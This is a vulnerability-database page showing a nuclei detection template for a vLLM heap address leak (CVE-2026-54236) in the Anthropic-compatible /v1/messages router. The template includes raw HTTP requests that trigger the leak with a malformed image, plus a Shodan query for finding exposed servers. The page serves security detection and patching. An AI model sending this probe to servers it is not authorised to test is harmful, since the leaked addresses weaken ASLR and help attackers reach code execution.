Lucene search
K

vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

vLLM up to 0.23.0 leaks heap addresses via the Anthropic router, enabling ASLR bypass; update.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-22778
2 Feb 202621:09
attackerkb
ATTACKERKB
CVE-2026-54236
22 Jun 202622:09
attackerkb
Chainguard
CVE-2026-22778 vulnerabilities
27 Mar 202601:17
cgr
Chainguard
CVE-2026-54236 vulnerabilities
2 Jul 202602:17
cgr
Circl
CVE-2026-22778
2 Feb 202623:21
circl
Circl
CVE-2026-54236
21 Jun 202623:10
circl
CNNVD
vLLM 日志信息泄露漏洞
2 Feb 202600:00
cnnvd
CVE
CVE-2026-22778
2 Feb 202621:09
cve
CVE
CVE-2026-54236
22 Jun 202622:09
cve
Cvelist
CVE-2026-22778 vLLM leaks a heap address when PIL throws an error
2 Feb 202621:09
cvelist
Rows per page
id: CVE-2026-54236

info:
  name: vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak
  author: kenlacroix
  severity: medium
  description: |
    vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added sanitize_message to the OpenAI router but the Anthropic-compatible router (/v1/messages) echoes str(exc) directly.
  impact: |
    Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.
  remediation: |
    Update to vllm version to latest.
  reference:
    - https://github.com/advisories/GHSA-hgg8-fqqc-vfmw
    - https://github.com/vllm-project/vllm/pull/45119
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-54236
    epss-score: 0.00796
    epss-percentile: 0.5201
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 2
    vendor: vllm
    product: vllm
    shodan-query: http.html:"/v1/models" http.html:"vllm"
    tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /v1/models HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"id\":")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: model
        part: body
        internal: true
        group: 1
        regex:
          - '"id"\s*:\s*"([^"]+)"'

  - raw:
      - |
        POST /v1/messages HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"model":"{{model}}","max_tokens":1,"messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image","source":{"type":"base64","media_type":"image/png","data":"bm90YW5pbWFnZQ=="}}]}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, "_io.BytesIO object at 0x", "internal_error")'
        condition: and
# digest: 4a0a004730450220534fa459a9ada58d488ff1d0eb86b1c501c18b3b5ee9f2bed5f079a0aceca52e022100dd1850c38607c80bc10aae86a0a67ab2f7c40ea34cc38765e275943ef0264d1f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jun 2026 23:10Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.19.8
EPSS0.03816
SSVC
5